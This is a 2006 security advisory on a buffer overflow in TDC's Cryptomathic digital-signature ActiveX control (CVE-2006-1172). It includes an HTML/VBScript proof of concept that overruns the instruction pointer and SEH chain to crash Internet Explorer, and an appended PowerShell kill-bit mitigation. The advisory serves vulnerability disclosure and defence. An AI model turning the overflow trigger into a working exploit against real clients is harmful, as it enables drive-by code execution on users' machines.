
| Subject: | [NT] Cryptomathic ActiveX Buffer Overflow |
|---|---|
| Date: | 7 May 2006 15:22:12 +0200 |
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

Cryptomathic ActiveX Buffer Overflow
------------------------------------------------------------------------

SUMMARY

"A <http://www.cryptomathic.com/products/primeink_csp.html> Cryptographic Service Provider (CSP) is a Microsoft Windows component that offers cryptographic services such as encryption or signing and the secure storage of user keys."

Improper handling of user input allows attackers to execute arbitrary code using the TDC Digital Signature ActiveX.

DETAILS

A vulnerability has been found in an ActiveX object distributed as part of TDC's Microsoft CSP suite. The suite consists of Cryptomathic PrimeInk CSP and some ActiveX objects. The primary task of the CSP is to handle private RSA keys that are encrypted by keys derived from user-provided passwords. The ActiveX objects assist in key management operations such as certificate request generation, installation of the issued certificate, key and certificate backup/recovery, and password changes. While Cryptomathic PrimeInk CSP is used by many institutions around the world, the ActiveX objects have only been distributed as part of TDC's Microsoft CSP suite in Denmark.

The problem is an unhandled field in cenroll.dll that allows full control of the instruction pointer (EIP) on the stack and of the SEH chain, giving several routes to code execution. The vulnerability allows code execution on any client machine that has the component installed if the user navigates to an attacker-created website. The attacker creates a website that calls the installed ActiveX component, or could craft an email with an embedded HTML page, thereby triggering the overflow.
Proof of Concept:

The Proof-of-Concept given here only shows that the vulnerability is present. A PoC has been developed proving that code execution is truly possible. The PoC below exploits the implementation used by TDC Digital Signature.

```html
<html>
<head>
<title>CIRT.DK - Cryptomathic ActiveX Buffer Overflow</title>
<IMG SRC="http://www.cirt.dk/images/logo.jpg">
</head>
<body>
<center>
<h1>TDC Digital Signature ActiveX Buffer Overflow</h1>
<h4>(c)2006 by Dennis Rand - CIRT.DK</h4>
The following Proof-of-Concept will make Internet Explorer shutdown, if you are vulnerable.<br>
</center>
<br>
<script>alert('Press "OK" to see if you are vulnerable')</script>
<object classid='clsid:6DA9275C-64E5-42A1-879C-D90B5F0DC5B4' id='target'></object>
<script language='vbscript'>
arg1 = String(8, "A")
arg1 = arg1 + "ABCD"          ' EIP is overwritten here
arg1 = arg1 + String(64, "B")
arg1 = arg1 + "AABB"          ' Pointer to the next SEH handler
arg1 = arg1 + "BBAA"          ' SE handler
arg1 = arg1 + String(700, "C")
arg2 = "DefaultV"
target.createPKCS10 arg1, arg2
</script>
<script>alert('You are secure')</script>
</body>
</html>
```

CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1172> CVE-2006-1172

Disclosure Timeline:
18-03-2006 Vulnerability discovered
28-03-2006 Vulnerability reported to Morten Storm, TDC Certificates; an email sent through csirt at csirt.dk
29-03-2006 TDC responds having received the report
30-03-2006 Received CERT/CC vulnerability tag / CVE tag
30-03-2006 Vulnerability reported to Cryptomathic (Morten.Landrock at cryptomathic.com and Torben.Pedersen at cryptomathic.com)
30-03-2006 Cryptomathic A/S verifies that they received the report.
25-04-2006 Cryptomathic A/S provides final fix to TDC
01-05-2006 Cryptomathic A/S and TDC approve the final advisory
05-05-2006 TDC releases news to the press and starts rolling out a patch.
05-05-2006 Public release

ADDITIONAL INFORMATION

The information has been provided by <mailto:advisory@cirt.dk> CIRT.DK.
The original article can be found at: <http://www.cirt.dk/advisories/cirt-43-advisory.pdf> http://www.cirt.dk/advisories/cirt-43-advisory.pdf

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

========================================

DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
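For administrators who cannot deploy the vendor patch immediately, the standard interim mitigation for a vulnerable ActiveX control is Internet Explorer's "kill bit", which tells IE to refuse to instantiate a control by CLSID. The script below is an added example, not part of the CIRT.DK advisory or of TDC's or Cryptomathic's software; it uses the CLSID from the advisory's PoC and Microsoft's documented ActiveX Compatibility registry mechanism (Compatibility Flags bit 0x400). It assumes an elevated PowerShell session on the affected Windows client and that the control is used only through IE; applications that host the control directly are not affected by the kill bit.

```powershell
# Added example (not from the advisory): set and verify the IE kill bit for the
# TDC Digital Signature ActiveX control (CLSID taken from the advisory's PoC).
# Run in an elevated PowerShell session; requires write access to HKLM.

$Clsid   = '{6DA9275C-64E5-42A1-879C-D90B5F0DC5B4}'
$KillBit = 0x400   # Compatibility Flags bit meaning "never load this control in IE"

# Native registry view, plus the WOW6432Node view that 32-bit IE reads on 64-bit Windows.
$Paths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') {
    $Paths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Get-CompatibilityFlags {
    param([string]$Path)
    if (-not (Test-Path $Path)) { return $null }
    $item = Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.'Compatibility Flags'
}

function Test-KillBit {
    param([string]$Path)
    $flags = Get-CompatibilityFlags -Path $Path
    if ($null -eq $flags) { return $false }
    return (($flags -band $KillBit) -ne 0)
}

function Set-KillBit {
    param([string]$Path)
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    $existing = Get-CompatibilityFlags -Path $Path
    # OR the kill bit into any flags already present rather than overwriting them.
    $new = if ($null -eq $existing) { $KillBit } else { $existing -bor $KillBit }
    Set-ItemProperty -Path $Path -Name 'Compatibility Flags' -Value $new -Type DWord
}

foreach ($p in $Paths) {
    if (Test-KillBit -Path $p) {
        Write-Output "Kill bit already set: $p"
    } else {
        Set-KillBit -Path $p
        if (Test-KillBit -Path $p) {
            Write-Output "Kill bit set: $p"
        } else {
            Write-Warning "Failed to set kill bit: $p"
        }
    }
}
```

The script is idempotent: re-running it reports the bit as already set. Once the patched control is installed, the kill bit must be cleared (or the vendor must ship the fixed control under a new CLSID) before IE will load it again, so record which CLSIDs you have kill-bitted.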